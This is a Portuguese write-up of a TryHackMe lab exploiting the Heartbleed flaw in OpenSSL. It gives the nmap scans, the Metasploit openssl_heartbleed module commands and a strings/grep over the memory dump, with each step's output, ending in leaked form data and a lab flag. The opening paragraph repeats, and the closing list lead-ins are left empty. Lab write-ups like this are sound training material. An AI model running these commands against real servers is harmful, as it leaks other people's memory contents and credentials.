
O objetivo deste projeto foi avaliar um host remoto quanto à vulnerabilidade Heartbleed (CVE-2014-0160), verificar sua presença e explorá-la para extrair informações potencialmente sensíveis da memória do servidor através do protocolo TLS.
O objetivo deste projeto foi avaliar um host remoto quanto à vulnerabilidade Heartbleed (CVE-2014-0160), verificar sua presença e explorá-la para extrair informações potencialmente sensíveis da memória do servidor através do protocolo TLS.
nmap -sC -sV 52.215.184.158 Resultado:
plaintext PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 111/tcp open rpcbind 2-4 443/tcp open ssl/http nginx 1.15.7
| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK | Not valid before: 2019-02-16T10:41:14 | Not valid after: 2020-02-16T10:41:14 O certificado TLS era autoassinado e expirado. Isso levantou a suspeita de que a versão do OpenSSL poderia estar desatualizada. Porta alvo: 443.
nmap -p 443 --script ssl-heartbleed 52.215.184.158 Resultado:
plaintext | ssl-heartbleed: | VULNERABLE: | OpenSSL 1.0.1 is vulnerable to Heartbleed | State: VULNERABLE | Risk factor: High | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 O alvo foi confirmado como vulnerável ao Heartbleed.
msfconsole use auxiliary/scanner/ssl/openssl_heartbleed set RHOSTS 52.215.184.158 run Resultado:
plaintext [+] Heartbeat response with leak, 44883 bytes [+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin Memória despejada com sucesso e armazenada localmente para análise.
strings openssl.heartble_152689.bin | grep -i "THM{" Resultado:
plaintext user_name=hacker101&user_email=[email protected]&user_message=THM{sSl-Is-BaD} Dados confidenciais, incluindo uma flag de aplicação, foram extraídos com sucesso da memória TLS — confirmando que a vulnerabilidade pode ser explorada na prática para vazar informações sensíveis.
Identifiquei e explorei com sucesso a CVE-2014-0160 em um servidor remoto. O processo incluiu:
A presença do Heartbleed em um sistema exposto publicamente representa um risco crítico: